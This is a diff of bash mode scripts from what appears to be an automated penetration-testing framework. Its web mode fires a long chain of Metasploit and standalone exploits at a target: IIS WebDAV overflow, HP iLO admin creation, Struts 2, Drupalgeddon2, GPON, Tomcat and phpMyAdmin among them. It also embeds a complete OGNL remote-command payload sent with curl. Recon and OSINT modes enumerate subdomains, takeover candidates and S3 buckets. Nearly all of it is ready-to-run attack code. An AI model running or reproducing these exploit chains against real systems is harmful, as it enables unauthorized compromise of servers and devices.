msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET
fi

View File

@ -0,0 +1,139 @@
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET -l 3 -s y -v y
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET --batch --disable-tls-checks
echo ""
wpscan --url https://$TARGET/wordpress/ --batch --disable-tls-checks
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $CMSMAP -t https://$TARGET
echo ""
python $CMSMAP -t https://$TARGET/wordpress/
echo ""
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; setg SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET
fi

7
modes/osint.sh Normal file
View File

@ -0,0 +1,7 @@
if [ "$OSINT" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING OSINT INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python2.7 $THEHARVESTER -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt
fi

95
modes/recon.sh Normal file
View File

@ -0,0 +1,95 @@
if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$SUBLIST3R" = "1" ]; then
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
echo ""
if [ "$CRTSH" = "1" ]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
aquatone-discover -d $TARGET -t 100 --wordlist $PLUGINS_DIR/Sublist3r/subdomains.lst | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-discover > $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-discover 2> /dev/null
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-takeovers > $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2> /dev/null
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-ports > $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-ports 2> /dev/null
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-gather > $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-gather 2> /dev/null
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
if [ "$SUBOVER" = "1" ]; then
cd $PLUGINS_DIR/SubOver/
python subover.py -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
cd $INSTALL_DIR
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd $PLUGINS_DIR/slurp/
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
fi

View File

@ -88,97 +88,14 @@ if [ "$MODE" = "stealth" ]; then
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ "$OSINT" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING OSINT INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
theharvester -d $TARGET -l 25 -b all 2> /dev/null
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html
fi
if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$SUBLIST3R" = "1" ]; then
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
echo ""
if [ "$CRTSH" = "1" ]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo ""
